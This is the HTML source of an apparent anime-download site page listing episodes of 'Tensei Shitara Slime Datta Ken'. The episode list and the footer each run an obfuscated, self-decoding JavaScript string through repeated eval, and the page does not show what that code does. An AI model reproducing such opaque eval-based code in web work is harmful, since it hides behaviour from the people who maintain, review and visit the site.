<!DOCTYPE html>
<!--[if !IE]>
<html class="no-js non-ie" lang="en-US"> <![endif]-->
<!--[if IE 7 ]>
<html class="no-js ie7" lang="en-US"> <![endif]-->
<!--[if IE 8 ]>
<html class="no-js ie8" lang="en-US"> <![endif]-->
<!--[if IE 9 ]>
<html class="no-js ie9" lang="en-US"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="">
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Tensei Shitara Slime Datta Ken &#8211; Nidai.Me</title>
<link rel='dns-prefetch' href='//nidai.me' />
<link rel='dns-prefetch' href='//platform-api.sharethis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
    <script type="text/javascript">
      window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/sardeath.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.9"}};
      !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
    </script>
    <style type="text/css">
img.wp-smiley,
img.emoji {
  display: inline !important;
  border: none !important;
  box-shadow: none !important;
  height: 1em !important;
  width: 1em !important;
  margin: 0 .07em !important;
  vertical-align: -0.1em !important;
  background: none !important;
  padding: 0 !important;
}
</style>
<link rel="icon" href="https://assets-cdn.github.com/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="https://assets-cdn.github.com/favicon.ico" type="image/x-icon" />
<link rel='stylesheet' id='dashicons-css'  href='https://assets.sardeath.com/sh/css/dashicons.min.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='menu-icons-extra-css'  href='https://assets.sardeath.com/sh/css/menu-extra.min.css?ver=0.11.2' type='text/css' media='all' />
<link rel='stylesheet' id='sparkling-bootstrap-css'  href='https://assets.sardeath.com/sh/css/bootstrap.min.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='sparkling-icons-css'  href='https://assets.sardeath.com/sh/css/fontawesome-all.min.css?ver=5.1.1.' type='text/css' media='all' />
<link rel='stylesheet' id='sparkling-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400italic%2C400%2C600%2C700%7CRoboto+Slab%3A400%2C300%2C700&#038;subset&#038;ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='sparkling-style-css'  href='https://assets.sardeath.com/sh/css/styles.css?ver=2.4.10.6' type='text/css' media='all' />
<script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/hrf-script.js?ver=4.9.9'></script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/vendor-bootstrap.min.js?ver=3.3.7'></script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/functions.js?ver=20180503'></script>
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script>
<link rel='https://api.w.org/' href='https://sardeath.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sardeath.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://sardeath.com/wp-includes/wlwmanifest.xml" />
<style type="text/css">.dropdown-menu {background-color: #ffffff;}.navbar-default .navbar-nav .dropdown-menu > li:hover, .navbar-default .navbar-nav .dropdown-menu > li:focus, .dropdown-menu > .active {background-color: #ffffff;}@media (max-width: 767px) {.navbar-default .navbar-nav .dropdown-menu > li:hover, .navbar-default .navbar-nav .dropdown-menu > li:focus, .dropdown-menu > .active {background: transparent;} }.dropdown-menu>.active>a, .dropdown-menu>.active>a:focus, .dropdown-menu>.active>a:hover, .dropdown-menu>.active>.caret, .dropdown-menu>li>a:focus, .dropdown-menu>li>a:hover, .dropdown-menu>li:hover>a, .dropdown-menu>li:hover>.caret {color:#da4453;}@media (max-width: 767px) {.navbar-default .navbar-nav .open .dropdown-menu > .active > a, .navbar-default .navbar-nav .dropdown-menu > li.active > .caret, .navbar-default .navbar-nav .dropdown-menu > li.open > a, .navbar-default .navbar-nav li.open > a, .navbar-default .navbar-nav li.open > .caret {color:#da4453;} }.navbar-default .navbar-nav .current-menu-ancestor a.dropdown-toggle { color: #da4453;}.entry-content {font-family: Open Sans;}</style>
<style type="text/css">
        .navbar > .container .navbar-brand {
      color: #dadada;
    }
    .panelist {
    background-color: #15B2D3;
    border: 1px solid #15B2D3;
    color: #000;
    font-weight: bold;
    padding: 2px 3px;
    font-size: 26px;
}
.an {background:#9000F0;color:#FFF;padding:2px 4px;margin:1px;font-weight:bold;
}
.nd {background:#E52775;color:#FFF;padding:2px 4px;margin:1px;font-weight:bold;
}
.dr {background:#FC580D;color:#FFF;padding:2px 4px;margin:1px;font-weight:bold;
}
.ri {background:#FF0000;color:#FFF;padding:2px 4px;margin:1px;font-weight:bold;
}
.pra {background:#000;color:#FFF;padding:2px 4px;margin:1px;font-weight:bold;
}
</style>
</head>
<body data-rsssl=1 class="page-template page-template-page-fullwidth page-template-page-fullwidth-php page page-id-63">
<a class="sr-only sr-only-focusable" href="#content">Skip to main content</a>
<div id="page" class="hfeed site">
<header id="masthead" class="site-header" role="banner">
<nav class="navbar navbar-default 
" role="navigation">
<div class="container">
<div class="row">
<div class="site-navigation-inner col-sm-12">
<div class="navbar-header">
<button type="button" class="btn navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<div id="logo">
<p class="site-name"><a class="navbar-brand" href="/" title="Nidai.Me Project" rel="home">Nidai.Me</a>
</p></div><!-- end of #logo -->
</div>
<div class="collapse navbar-collapse navbar-ex1-collapse"><ul id="menu-default" class="nav navbar-nav"><li id="menu-item-130680" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130680"><a title="Download OST Anime" href="https://sardeath.com/category/ost-anime/">OST Anime</a></li>
<li id="menu-item-130946" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130946"><a title="Download Japan Music" href="https://sardeath.com/category/j-pop-music/">J-Music</a></li>
<li id="menu-item-130682" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130682"><a title="Download Original Soundtrack Music" href="https://sardeath.com/category/original-soundtrack/">Soundtrack</a></li>
<li id="menu-item-134406" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-134406"><a title="Add Me on Facebook" href="https://www.facebook.com/andry.st4zz"><i class="_mi _before dashicons dashicons-facebook" aria-hidden="true"></i><span>Facebook</span></a></li>
</ul></div></div>
</div>
</div>
</nav><!-- .site-navigation -->
</header><!-- #masthead -->
<div id="content" class="site-content">
<div class="top-section">
</div>
<div class="container main-content-area">
<div class="header-ad text-center" style="height: 10px; margin-bottom: 20px;"></div>
<div class="row index-container side-pull-left">
<div class="main-content-inner col-sm-12 col-md-12">

  <div id="primary" class="content-area">

  <main id="main" class="site-main" role="main">

    
    <div class="post-inner-content">
<article id="post-63" class="post-63 page type-page status-publish hentry">
<div class="entry-content">
   <p align="center"><img src="https://drive.google.com/uc?export=view&id=1fnc5VWrnHn_8IktNWwZRdibMb38I6Lxg" title="Cover" alt="Cover" style="border-radius: 50%; width: 250px; height: 250px; border: 2px solid #FF00000;"/></p>
<span class="an">Title: Tensei Shitara Slime Datta Ken</span><br/>
<span class="nd">Total Episodes: 25</span><br/>
<span class="dr">Aired: Oct 2, 2018 to ?</span><br/>
<span class="ri">Studios: Funimation</span><br/>
<span class="pra">Genre: Fantasy, Shounen</span><br/>
<p><h2>#INFORMASI</h2>
<span id="uncom"></span></p></div>
</article>
</div>
</main>
</div>

     <div id="primary" class="content-area">
         <div class="panelist" align="center"><tl>LIST EPISODE</tl></div>
<main id="main" class="site-main" role="main">
<div class="post-inner-content">
<article id="post-63" class="post-63 page type-page status-publish hentry">
  <div class="entry-content">
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x,y){var i,o=\"\",l=x.length;for(i=0;i<l;i++){y%=127;o+=St" +
"ring.fromCharCode(x.charCodeAt(i)^(y++));}return o;}f(\"@RFJ^BCC\\016I\\030" +
"I\\033HBTD\\027Q\\025U\\006\\036\\037\\022P,|:m( ( <!f'q\\\"\\\"t'9;?1}.y;1" +
";)\\0372::!\\025J\\017KTUNIT^SE\\026\\032\\035\\t\\n\\nXI\\rM\\033SD\\026@\\"+
"001\\036\\037tbj+a,}zuoey$d3c= )z*(&,q472gr5\\\"X\\017AKEWgS\\000@\\003\\02" +
"0Q_K[EC\\\\\\023[\\033EBZJNI\\024\\r\\022P,hy>\\\"mdn{{f\\027n=4=14*s}\\tt\\"+
"013\\004i}rlon\\003<SRS89UWX56]_]23\\027@BC()\\002+$KJK !;SPD_XYZW9;:WP>??L" +
"MEM!&&KD-)+@A+,\\020}~\\023\\026\\025z{uijdla\\035\\037\\000mn\\002\\007\\0" +
"05jk\\014\\t\\ng`\\r\\014\\017\\034\\035mlc1)98&\\177\\001d<yxa\\r\\016816y" +
"{\\t!\\\"89v\\003\\000\\026U-+SPW\\t45 (Z_^3,BBC()<I;MJK !\\\"\\\"]^245Z[89" +
":WP96,F&##HI93  =MKE./\\020}~Mxy{\\021\\032\\031vw\\031\\035\\036sl\\007\\0" +
"32\\034\\r\\n\\000\\001\\006\\n\\t\\n\\014\\013\\016\\003u!a\\037f\\031\\03" +
"2h-foddd\\022m\\014\\r8u`}d\\014ikj\\007\\000olo<=TST9:/\\\"$&4X_^3,\\030\\" +
"006/(%65HKJ' 7=L_O@176[TgVW;<>SLY[RC^E@)sibjrdhS}\\000\\013BX\\035H\\010GX^" +
"XH\\\\R\\013\\030\\033\\030\\037L\\036i\\021P\\022O}XZP\\0033#+'k>o--%\\010" +
">,&\\014=> 5z28>*-\\tfw2ehRP_F\\035\\036OLC\\000Q\\007P\\004U_M\\030Z\\001\\"+
"033\\023M\\037\\014\\036\\024\\036\\020S\\006=m._&Y$:g%c+~lxt9h>k<s6ywpnxrh" +
"x=\\t\",38)"                                                                 ;
while(x=eval(x));
//-->
//]]>
</script>
    </div><!-- .entry-content -->
  </article><!-- #post-## -->
</div>
    
    
  </main><!-- #main -->

</div><!-- close .main-content-inner -->

  </div><!-- #primary -->

</div><!-- close .main-content-inner -->
</div><!-- close .row -->
</div><!-- close .container -->
</div><!-- close .site-content -->
<footer class="footer">
<div class="container" id="footer-container">
<div class="footer-content">©<script>document.write(new Date().getFullYear());</script> Nidai.Me<font color="#FF0000">／</font>GDrive Anime Project
    <br/>Powered by Github & AWS</div>
</footer>
</div><!-- #page -->
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
"=94){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
".substr(0,ol);}f(\")211,\\\"=2;W430\\\\ zvkr530\\\\M12&\\\"\\\\ ^630\\\\>`Z" +
"p\\\\\\\\E720\\\\.>3\\\"\\\\,N610\\\\+&jce010\\\\[l /*e530\\\\Pq /*t410\\\\" +
"_j}(` ^630\\\\>.&\\\"\\\\ 020\\\\blR=+}^630\\\\>.&\\\"\\\\ ^PB|Z25^400\\\\z" +
"kcrs^630\\\\>.&\\\"\\\\ ^630\\\\>`Zp\\\\\\\\^220\\\\9<40\\\\\\\\H410\\\\,R4" +
"63\\\"\\\\r\\\\,<Z42Lb,:5^0O410\\\\B840\\\\\\\\Ln\\\\-R&21Lb(<4^2Jr\\\\B!50" +
"2\\\"\\\\010\\\\,<Z04Mb-<4^6L410\\\\B<21\\\\\\\\^120\\\\/<4^6L410\\\\B<21\\" +
"\\\\\\M410\\\\,R002\\\"\\\\410\\\\*=Z\\\"\\\\3L410\\\\B840\\\\\\\\Ln\\\\-R6" +
"32\\\"\\\\010\\\\,<Z04Mb,<4^6L410\\\\B<21\\\\\\\\N710\\\\,R002\\\"\\\\410\\" +
"\\*=Z\\\"\\\\2L410\\\\B840\\\\\\\\Ln\\\\-R:<1L410\\\\B840\\\\\\\\Ln\\\\-R63" +
"2\\\"\\\\010\\\\,<Z04Mb>=40\\\\\\\\H410\\\\,R463\\\"\\\\610\\\\/<Z42Lb,:5^2" +
"L410\\\\B840\\\\\\\\Ln\\\\-R&<3L410\\\\B840\\\\\\\\Ln\\\\-R702\\\"\\\\010\\" +
"\\,<Z04Mb/<4^6L410\\\\B<21\\\\\\\\L410\\\\,R002\\\"\\\\410\\\\*=Z\\\"\\\\1L" +
"410\\\\B840\\\\\\\\Ln\\\\-R502\\\"\\\\010\\\\,<Z04Mb,<4^6L410\\\\B<21\\\\\\" +
"\\O410\\\\,R002\\\"\\\\410\\\\*=Z02Lb(<4^2Jr\\\\B.632\\\"\\\\010\\\\,<Z04Mb" +
"/<4^6L410\\\\B<21\\\\\\\\M410\\\\,R002\\\"\\\\410\\\\*=Z\\\"\\\\/Q220\\\\9>" +
"627H600\\\\z;d21430\\\\\\\\\\\\)>>5cH\\\\\\\\9.<qr330\\\\J}otch530\\\\630\\" +
"\\>.&\\\"\\\\ ^630\\\\>.&\\\"\\\\n\\\"\\\\LBu&\\\"\\\\ ^630\\\\>.&\\\"\\\\ " +
"020\\\\blR&.'220\\\\J9&cnf030\\\\_| qmd020\\\\Wi.;\\\"\\\\b^L771\\\\x&\\\"\\"+
"\\ ^630\\\\>.&l\\\\\\\\410\\\\b zvkr530\\\\M\\\"\\\\`Zp\\\\\\\\@JngtasQ200\\"+
"\\ ,Zvp720\\\\L}}gta420\\\\120\\\\jvcv\\\"\\\\\\\"\\\\300\\\\{~771\\\\v \\\\"+
"\\\\!710\\\\120\\\\T030\\\\410\\\\620\\\\220\\\\Z120\\\\630\\\\\\\\\\\\030\\"+
"\\120\\\\310\\\\700\\\\300\\\\CDP230\\\\030\\\\320\\\\220\\\\r\\\\F?_200\\\\"+
"220\\\\,~),2(:+k8t\\\\&710\\\\l% &<.?dvwo4,k!/$'!]020\\\\pgk-s420\\\\R130\\" +
"\\620\\\\T020\\\\130\\\\320\\\\730\\\\330\\\\[\\\\\\\\H200\\\\000\\\\330\\\\"+
"230\\\\500\\\\KVt\\\\330\\\\330\\\\G220\\\\520\\\\r\\\\120\\\\100\\\\220\\\\"+
"\\\\\\\\1200\\\\/000\\\\e.)1%5&{olv#%`#%&d=!\\\"\\\\6<0lpop120\\\\310\\\\22" +
"0\\\\HR_IAC130\\\\FVZ^630\\\\HNDL300\\\\FEJ600\\\\BTDHEFTOs}3oqt}{89/gcfex(" +
"3n~x*}xntfw? )n220\\\\030\\\\010\\\\220\\\\010\\\\610\\\\V300\\\\030\\\\020" +
"\\\\130\\\\600\\\\120\\\\630\\\\420\\\\\\\"(f};o nruter};))++y(^)i(tAedoCra" +
"hc.x(edoCrahCmorf.gnirtS=+o;721=%y;2=*y))y+211(>i(fi{)++i;l<i;0=i(rof;htgne" +
"l.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                                   ;
while(x=eval(x));
//-->
//]]>
</script>
    <script type="text/javascript">
      jQuery(document).ready(function ($) {
      if ($(window).width() >= 767) {
        $('.navbar-nav > li.menu-item > a').click(function () {
        if ($(this).attr('target') !== '_blank') {
          window.location = $(this).attr('href')
        }
        })
      }
      })
    </script>
  <style type="text/css">
            h2.frq-main-title{
               font-size: 24px;
            }
            .hrf-entry{
               border:none !important;
               margin-bottom: 0px !important;
               padding-bottom: 0px !important;
            }
            .hrf-content{
               display:none;
               color: #444444;
               background: ffffff;
               font-size: 16px;
               padding: 10px;
               padding-left: 50px;
               word-break: normal;
            }
            h4.hrf-title{
               font-size: 18px ;
               color: #444444;
               background: #ffffff;
               padding: 10px ;
               padding-left: 50px;
               margin: 0;
               -webkit-touch-callout: none;
               -webkit-user-select: none;
               -khtml-user-select: none;
               -moz-user-select: none;
               -ms-user-select: none;
               user-select: none;
               outline-style:none;
            }
            .hrf-title.close-faq{
               cursor: pointer;
            }
            .hrf-title.close-faq span{
               width: 30px;
               height: 30px;
               display: inline-block;
               position: relative;
               left: 0;
               top: 8px;
               margin-right: 12px;
               margin-left: -42px;
               background: #444444 url(https://assets.sardeath.com/sh/open.png) no-repeat center center;
            }
            }.hrf-title.open-faq{
            
            }
            .hrf-title.open-faq span{
               width: 30px;
               height: 30px;
               display: inline-block;
               position: relative;
               left: 0;
               top: 8px;
               margin-right: 12px;
               margin-left: -42px;
               background: #444444 url(https://assets.sardeath.com/sh/close.png) no-repeat center center;
            }
            .hrf-entry p{
            
            }
            .hrf-entry ul{
            
            }
            .hrf-entry ul li{
            
            }</style>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/skip-link-focus-fix.min.js?ver=20140222'></script>
<script type='text/javascript' src='https://assets.sardeath.com/sh/js/embed.min.js?ver=4.9.9'></script>
</body>
</html>
